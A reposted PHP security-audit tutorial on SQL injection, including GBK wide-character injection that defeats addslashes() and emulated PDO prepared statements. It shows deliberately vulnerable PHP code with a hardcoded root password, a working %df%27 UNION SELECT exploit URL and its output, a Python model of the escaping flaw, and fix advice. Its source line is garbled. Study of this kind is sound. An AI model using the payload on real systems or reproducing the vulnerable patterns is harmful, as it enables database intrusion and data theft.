PHP Audit Basics 1: SQL Injection

Source: Internet  Published: live webcast of the US president's visit to China  Editor: 程序博客网  Time: 2024/05/17 03:47

【1】Plain SQL injection:

// The raw $_POST values are interpolated straight into the SQL string (deliberately vulnerable example)
$sql = "INSERT INTO books(bookname, publisher, author, price, ptime, pic, detail) VALUES('{$_POST["bookname"]}', '{$_POST["publisher"]}', '{$_POST["author"]}', '{$_POST["price"]}', '" . time() . "', '{$up[1]}', '{$_POST["detail"]}')";
$result = mysql_query($sql);
if ($result && mysql_affected_rows() > 0) {
    echo "插入一条数据成功!";
} else {
    echo "数据录入失败!";
}

The request parameters are passed straight into the database without any filtering.


【2】Wide-character injection:

Conditions

The table was created in MySQL with its character set set to GBK (DEFAULT CHARSET=gbk),

and when PHP connects to the database, the connection's character set is switched with mysql_query("set character_set_client=gbk");


(1) %df%27 can be used to get past the addslashes() function

(2) PDO's quote() function can be bypassed as well

【3】PDO prepared statements are bypassed as well:

First form

<?php
header("Content-type:text/html;charset=utf-8");
try {
    $pdo = new PDO("mysql:host=localhost;dbname=test", "root", "niexinming132");
} catch (Exception $ex) {
    echo "连接失败";
    exit;
}
echo "连接成功";
// Switches the server-side client charset behind the PDO driver's back;
// with emulated prepares the driver still escapes values using the charset it connected with
$pdo->query("set character_set_client=gbk");
$id = $_GET["id"];
$query = "select * from myuser where id=?";
echo $query;
echo "<br>";
$stmt = $pdo->prepare($query);
$pdostat = $stmt->execute(array($id));
foreach ($stmt->fetchAll(PDO::FETCH_ASSOC) as $row) {
    foreach ($row as $data) {
        echo $data . "        ";
    }
    echo "<br>";
}

Second form:

<?php
header("Content-type:text/html;charset=utf-8");
try {
    $pdo = new PDO("mysql:host=localhost;dbname=test", "root", "niexinming132");
} catch (Exception $ex) {
    echo "连接失败";
    exit;
}
echo "连接成功";
// Same charset switch as above; the named placeholder changes nothing about the escaping
$pdo->query("set character_set_client=gbk");
$id = $_GET["id"];
$query = "select * from myuser where id=:id";
echo $query;
echo "<br>";
$stmt = $pdo->prepare($query);
$pdostat = $stmt->execute(array("id" => $id));
foreach ($stmt->fetchAll(PDO::FETCH_ASSOC) as $row) {
    foreach ($row as $data) {
        echo $data . "        ";
    }
    echo "<br>";
    echo "执行完毕";
    var_dump($pdo->errorInfo());
}

Exploitation:

http://localhost:8000/gbksql2.php?id=-1%df%27%20union%20select%201,version(),user(),4%20%23

Output:

连接成功select * from myuser where id=:id
1 5.5.50-0ubuntu0.14.04.1-log root@localhost 4
执行完毕
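Added example, not code from the original post: a Python model of why the %df%27 sequence above survives addslashes() but not an escaper that knows the connection is GBK. It reimplements addslashes(), a charset-aware escaper in the style of mysql_real_escape_string() once the client library has been told the charset, and the server's scan for the quote that ends a string literal; the GBK lead/trail byte ranges are standard, the payload is the URL above decoded, and the function names are my own.

```python
from typing import Optional

# Constructed payload: the query string from the URL above, URL-decoded (%df%27 -> 0xdf 0x27).
PAYLOAD = b"-1\xdf' union select 1,version(),user(),4 #"

def gbk_pair(data: bytes, i: int) -> bool:
    """True if data[i] is a GBK lead byte (0x81-0xFE) followed by a valid trail byte."""
    return (i + 1 < len(data) and 0x81 <= data[i] <= 0xFE
            and (0x40 <= data[i + 1] <= 0x7E or 0x80 <= data[i + 1] <= 0xFE))

def addslashes(data: bytes) -> bytes:
    """Charset-unaware escaping like PHP's addslashes(): a bare 0x5c before ' " \\ and NUL."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\\x00":
            out.append(0x5C)
        out.append(b)
    return bytes(out)

def escape_gbk_aware(data: bytes) -> bytes:
    """Escaping that knows the connection is GBK: a valid lead+trail pair is copied through,
    while a lead byte with no valid trail byte is escaped itself, so it can never pair up
    with the 0x5c that protects the quote after it."""
    out = bytearray()
    i = 0
    while i < len(data):
        if gbk_pair(data, i):
            out += data[i:i + 2]
            i += 2
            continue
        if 0x81 <= data[i] <= 0xFE or data[i] in b"'\"\\\x00":
            out.append(0x5C)
        out.append(data[i])
        i += 1
    return bytes(out)

def literal_end(data: bytes, quote: int = 0x27) -> Optional[int]:
    """Index of the unescaped quote that ends a GBK string literal, or None if the quote
    never closes it. Models the server-side scan: a lead+trail pair is one character, a
    backslash consumes the next byte, a bare quote terminates (doubled quotes not modelled)."""
    i = 0
    while i < len(data):
        if gbk_pair(data, i) or data[i] == 0x5C:
            i += 2  # one two-byte character, or a backslash plus the byte it escapes
        elif data[i] == quote:
            return i
        else:
            i += 1
    return None
```

The PHP-side fix this model points at is to tell the client library the charset (the charset= DSN parameter for PDO, or mysql_set_charset() for the legacy extension) instead of issuing set character_set_client through a query the library never interprets, and to set PDO::ATTR_EMULATE_PREPARES to false so placeholders are bound by the server rather than escaped client-side.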

